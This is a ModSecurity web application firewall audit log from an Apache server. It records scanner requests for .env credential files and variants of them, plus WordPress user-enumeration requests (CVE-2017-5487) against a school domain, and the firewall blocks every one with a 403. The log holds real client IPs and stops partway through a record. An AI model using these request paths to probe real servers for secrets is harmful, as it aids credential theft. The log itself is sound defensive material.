p2=0, p3=0, p4=0, p5=36, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f63b7b04-Z-- --753c2918-A-- [15/Jun/2025:00:27:43 +0700] aE2xD0MWfhkd5Y0sFtotKwAAAJA 103.236.140.4 53656 103.236.140.4 8181 --753c2918-B-- GET /xyz/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.179 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.179 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; Android 7.1.1; SAMSUNG SM-N950U Build/NMF26X) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/6.4 Chrome/56.0.2924.87 Mobile Safari/537.36 --753c2918-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --753c2918-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749922063946358 714 (- - -) Stopwatch2: 1749922063946358 714; combined=277, p1=241, p2=0, p3=0, p4=0, p5=36, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --753c2918-Z-- --99cc9e48-A-- [15/Jun/2025:00:38:18 +0700] aE2zikMWfhkd5Y0sFtotLgAAAJM 103.236.140.4 53680 103.236.140.4 8181 --99cc9e48-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36 OPR/36.0.2130.46 Accept-Charset: utf-8 --99cc9e48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --99cc9e48-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749922698641499 876 (- - -) Stopwatch2: 1749922698641499 876; combined=360, p1=313, p2=0, p3=0, p4=0, p5=47, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --99cc9e48-Z-- --2f340e2b-A-- [15/Jun/2025:00:42:05 +0700] aE20bV3g_boun6Rx5jIL7QAAANM 103.236.140.4 53682 103.236.140.4 8181 --2f340e2b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; ONE E1003) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.136 Mobile Safari/537.36 Accept-Charset: utf-8 --2f340e2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f340e2b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749922925496158 899 (- - -) Stopwatch2: 1749922925496158 899; combined=369, p1=328, p2=0, p3=0, p4=0, p5=41, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f340e2b-Z-- --c1442c30-A-- [15/Jun/2025:01:24:18 +0700] aE2-UmmwZ6YUkjOdtI4M9wAAAAs 103.236.140.4 54424 103.236.140.4 8181 --c1442c30-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 162.243.99.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 162.243.99.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --c1442c30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c1442c30-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749925458639334 757 (- - -) Stopwatch2: 1749925458639334 757; combined=313, p1=264, p2=0, p3=0, p4=0, p5=49, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1442c30-Z-- --2d15ff7e-A-- [15/Jun/2025:01:45:25 +0700] aE3DRWIDXuKmWNi2UBTxngAAAEo 103.236.140.4 54462 103.236.140.4 8181 --2d15ff7e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063 Accept-Charset: utf-8 --2d15ff7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2d15ff7e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749926725527964 799 (- - -) Stopwatch2: 1749926725527964 799; combined=329, p1=288, p2=0, p3=0, p4=0, p5=41, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2d15ff7e-Z-- --f8bb8830-A-- [15/Jun/2025:01:47:11 +0700] aE3Dr2IDXuKmWNi2UBTxoQAAAFQ 103.236.140.4 54472 103.236.140.4 8181 --f8bb8830-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36 Accept-Charset: utf-8 --f8bb8830-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f8bb8830-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749926831907969 875 (- - -) Stopwatch2: 1749926831907969 875; combined=381, p1=342, p2=0, p3=0, p4=0, p5=39, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8bb8830-Z-- --892c4350-A-- [15/Jun/2025:02:01:05 +0700] aE3G8WIDXuKmWNi2UBTxpwAAAEU 103.236.140.4 54516 103.236.140.4 8181 --892c4350-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.209.178.134 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.209.178.134 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --892c4350-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --892c4350-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749927665672909 3369 (- - -) Stopwatch2: 1749927665672909 3369; combined=1479, p1=521, p2=925, p3=0, p4=0, p5=33, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --892c4350-Z-- --5957622f-A-- [15/Jun/2025:02:11:40 +0700] aE3JbGIDXuKmWNi2UBTxqgAAAFA 103.236.140.4 54574 103.236.140.4 8181 --5957622f-B-- GET /.docker/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/79.0.259819395 Mobile/16G77 Safari/604.1 Accept-Charset: utf-8 --5957622f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5957622f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749928300982282 896 (- - -) Stopwatch2: 1749928300982282 896; combined=347, p1=304, p2=0, p3=0, p4=0, p5=43, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5957622f-Z-- --4c8e9c6d-A-- [15/Jun/2025:02:52:59 +0700] aE3TG2mwZ6YUkjOdtI4NDwAAAAc 103.236.140.4 54724 103.236.140.4 8181 --4c8e9c6d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 179.108.17.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 179.108.17.183 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4c8e9c6d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4c8e9c6d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749930779246737 3451 (- - -) Stopwatch2: 1749930779246737 3451; combined=1508, p1=523, p2=953, p3=0, p4=0, p5=32, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4c8e9c6d-Z-- --dd9cff25-A-- [15/Jun/2025:02:53:54 +0700] aE3TUmmwZ6YUkjOdtI4NEQAAABE 103.236.140.4 54728 103.236.140.4 8181 --dd9cff25-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 196.41.45.242 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 196.41.45.242 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --dd9cff25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dd9cff25-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749930834144214 2854 (- - -) Stopwatch2: 1749930834144214 2854; combined=1309, p1=430, p2=848, p3=0, p4=0, p5=30, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dd9cff25-Z-- --fafcbc34-A-- [15/Jun/2025:03:35:04 +0700] aE3c-GmwZ6YUkjOdtI4NKQAAAAY 103.236.140.4 54850 103.236.140.4 8181 --fafcbc34-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15 Accept-Charset: utf-8 --fafcbc34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fafcbc34-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749933304201328 3802 (- - -) Stopwatch2: 1749933304201328 3802; combined=502, p1=388, p2=0, p3=0, p4=0, p5=114, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fafcbc34-Z-- --e93d8e19-A-- [15/Jun/2025:03:35:13 +0700] aE3dAWmwZ6YUkjOdtI4NKgAAAAg 103.236.140.4 54852 103.236.140.4 8181 --e93d8e19-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Opera/9.30 (Nintendo Wii; U; ; 2047-7; en) Accept-Charset: utf-8 --e93d8e19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e93d8e19-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749933313411408 965 (- - -) Stopwatch2: 1749933313411408 965; combined=372, p1=327, p2=0, p3=0, p4=0, p5=45, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e93d8e19-Z-- --528da03f-A-- [15/Jun/2025:03:53:57 +0700] aE3hZT2YoubFl106kA3SWgAAAIs 103.236.140.4 54962 103.236.140.4 8181 --528da03f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 213.199.48.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.199.48.236 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --528da03f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --528da03f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749934437980071 3475 (- - -) Stopwatch2: 1749934437980071 3475; combined=1373, p1=479, p2=864, p3=0, p4=0, p5=30, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --528da03f-Z-- --b1242a79-A-- [15/Jun/2025:05:47:20 +0700] aE37-D2YoubFl106kA3SpAAAAJc 103.236.140.4 55340 103.236.140.4 8181 --b1242a79-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 107.170.18.211 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 107.170.18.211 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --b1242a79-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b1242a79-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749941240705767 924 (- - -) Stopwatch2: 1749941240705767 924; combined=405, p1=364, p2=0, p3=0, p4=0, p5=41, sr=134, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1242a79-Z-- --91f49f28-A-- [15/Jun/2025:05:59:33 +0700] aE3-1br7GPil_2h-MzYG5wAAAM0 103.236.140.4 55376 103.236.140.4 8181 --91f49f28-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-T230NU Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36 --91f49f28-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --91f49f28-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749941973776104 958 (- - -) Stopwatch2: 1749941973776104 958; combined=380, p1=339, p2=0, p3=0, p4=0, p5=41, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --91f49f28-Z-- --c1c9d700-A-- [15/Jun/2025:05:59:34 +0700] aE3-1rr7GPil_2h-MzYG6AAAAM4 103.236.140.4 55378 103.236.140.4 8181 --c1c9d700-B-- GET /.env.crt HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.3) Gecko/20100524 Firefox/3.5.1 --c1c9d700-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c1c9d700-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749941974222973 803 (- - -) Stopwatch2: 1749941974222973 803; combined=360, p1=323, p2=0, p3=0, p4=0, p5=37, sr=132, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1c9d700-Z-- --11906567-A-- [15/Jun/2025:05:59:35 +0700] aE3-1z2YoubFl106kA3SrQAAAI4 103.236.140.4 55382 103.236.140.4 8181 --11906567-B-- GET /.env.pem HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; SPH-M580BST Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 --11906567-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --11906567-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749941975112375 764 (- - -) Stopwatch2: 1749941975112375 764; combined=356, p1=323, p2=0, p3=0, p4=0, p5=33, sr=162, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11906567-Z-- --bc73a94e-A-- [15/Jun/2025:05:59:35 +0700] aE3-1z2YoubFl106kA3SrgAAAJA 103.236.140.4 55384 103.236.140.4 8181 --bc73a94e-B-- GET /.envfile HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; BRAVIA 2015 Build/LMY48E.S223) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36 OPR/28.0.1754.0 OMI/4.4.22.20.E102586-1.136 --bc73a94e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bc73a94e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749941975554323 713 (- - -) Stopwatch2: 1749941975554323 713; combined=314, p1=281, p2=0, p3=0, p4=0, p5=33, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bc73a94e-Z-- --bb0b1113-A-- [15/Jun/2025:05:59:35 +0700] aE3-1_GguMGNwgSGIMwhsQAAAA4 103.236.140.4 55386 103.236.140.4 8181 --bb0b1113-B-- GET /Tmp/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 (.NET CLR 3.5.30729) --bb0b1113-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb0b1113-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: 